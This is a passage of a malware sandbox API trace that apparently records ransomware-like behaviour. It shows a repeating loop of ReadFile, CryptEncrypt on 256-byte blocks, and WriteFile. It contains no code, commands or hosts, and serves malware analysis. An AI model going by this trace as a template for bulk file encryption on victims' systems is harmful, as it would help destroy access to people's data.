CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.251] GetLastError () returned 0x0 [0149.251] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.251] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.252] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.252] GetLastError () returned 0x0 [0149.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.252] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.252] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.252] GetLastError () returned 0x0 [0149.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.252] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.252] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.252] GetLastError () returned 0x0 [0149.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.252] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.252] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.252] GetLastError () returned 0x0 [0149.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.252] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.252] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.252] GetLastError () returned 0x0 [0149.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.252] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.252] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.252] GetLastError () returned 0x0 [0149.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.252] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.252] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.252] GetLastError () returned 0x0 [0149.252] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.253] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.253] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.253] GetLastError () returned 0x0 [0149.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.253] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.253] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.253] GetLastError () returned 0x0 [0149.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.253] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.253] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.253] GetLastError () returned 0x0 [0149.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.253] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.253] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.253] GetLastError () returned 0x0 [0149.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.253] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.253] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.253] GetLastError () returned 0x0 [0149.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.253] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.253] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.253] GetLastError () returned 0x0 [0149.253] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.253] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.254] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.254] GetLastError () returned 0x0 [0149.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.254] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.254] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.254] GetLastError () returned 0x0 [0149.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.254] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.254] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.254] GetLastError () returned 0x0 [0149.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.254] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.254] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.254] GetLastError () returned 0x0 [0149.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.254] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.254] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.254] GetLastError () returned 0x0 [0149.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.254] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.254] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.254] GetLastError () returned 0x0 [0149.254] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.254] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.255] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.255] GetLastError () returned 0x0 [0149.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.255] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.255] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.255] GetLastError () returned 0x0 [0149.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.255] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.255] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.255] GetLastError () returned 0x0 [0149.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.255] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.255] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.255] GetLastError () returned 0x0 [0149.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.255] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.255] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.255] GetLastError () returned 0x0 [0149.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.255] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.255] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.255] GetLastError () returned 0x0 [0149.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.255] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.255] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.255] GetLastError () returned 0x0 [0149.255] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.256] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.256] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.256] GetLastError () returned 0x0 [0149.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.256] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.256] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.256] GetLastError () returned 0x0 [0149.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.256] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.256] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.256] GetLastError () returned 0x0 [0149.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.256] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.256] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.256] GetLastError () returned 0x0 [0149.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.256] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.256] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.256] GetLastError () returned 0x0 [0149.256] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.256] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.256] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, 